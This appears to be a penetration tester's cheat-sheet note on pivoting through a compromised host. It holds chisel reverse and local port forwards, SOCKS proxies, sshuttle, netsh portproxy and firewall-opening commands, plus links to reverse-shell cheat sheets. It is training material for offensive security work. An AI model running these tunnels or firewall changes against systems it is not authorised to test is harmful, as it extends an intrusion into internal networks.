You may recognise this as being very similar to the SSH reverse port forward method, where we specify the local port to open, the target IP, and the target port, separated by colons. Note the distinction between the LISTEN_PORT and the LOCAL_PORT. Here the LISTEN_PORT is the port that we started the chisel server on, and the LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.
To use an old example, let's assume that our own IP is 172.16.0.20, the compromised server's IP is 172.16.0.5, and our target is port 22 on 172.16.0.10. The syntax for forwarding 172.16.0.10:22 back to port 2222 on our attacking machine would be as follows:
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 &
Connecting back to our attacking machine, functioning as a chisel server started with:
./chisel server -p 1337 --reverse &
This would allow us to access 172.16.0.10:22 (via SSH) by navigating to 127.0.0.1:2222.
Local Port Forward:
As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.
On the compromised target we set up a chisel server:
./chisel server -p LISTEN_PORT
We now connect to this from our attacking machine like so:
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
For example, to connect to 172.16.0.5:8000 (the compromised host running a chisel server), forwarding our local port 2222 to 172.16.0.10:22 (our intended target), we could use:
./chisel client 172.16.0.5:8000 2222:172.16.0.10:22
Forward SOCKS Proxy:
VICTIM:
./chisel server -p <% tp.frontmatter["RPORT"] %> --socks5
KALI:
./chisel client <% tp.frontmatter["RHOST"] %>:<% tp.frontmatter["RPORT"] %> <% tp.frontmatter["LPORT"] %>:socks
Reverse SOCKS Proxy:
KALI:
./chisel server -p <% tp.frontmatter["LPORT"] %> --reverse --socks5&
VICTIM:
./chisel client <% tp.frontmatter["LHOST"] %>:<% tp.frontmatter["LPORT"] %> R:socks &
sshuttle -r user@<% tp.frontmatter["RHOST"] %> <% tp.frontmatter["RHOST"] %>/24
sshuttle -r user@address --ssh-cmd "ssh -i KEYFILE" SUBNET
sshuttle -r user@<% tp.frontmatter["RHOST"] %> <% tp.frontmatter["RHOST"] %>/24 -x <% tp.frontmatter["RHOST"] %>
This will allow sshuttle to create a connection without disrupting itself.
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.223.64 connectport=4545 connectaddress=10.4.223.215
netstat -anp TCP | find "2223"
netsh interface portproxy show all
# netsh firewall exception
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.223.64 localport=2222 action=allow
# cleaning
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64
CentOS Port Enable 15420:
firewall-cmd --zone=public --add-port 15420/tcp
Windows allow port 15222:
netsh advfirewall firewall add rule name="schizel" dir=in action=allow protocol=tcp localport=15222
https://github.com/Tib3rius/Pentest-Cheatsheets https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html https://gist.github.com/jivoi/1c8fc3988af2e5b6df0d6cb188514962 https://wadcoms.github.io/ http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.revshells.com/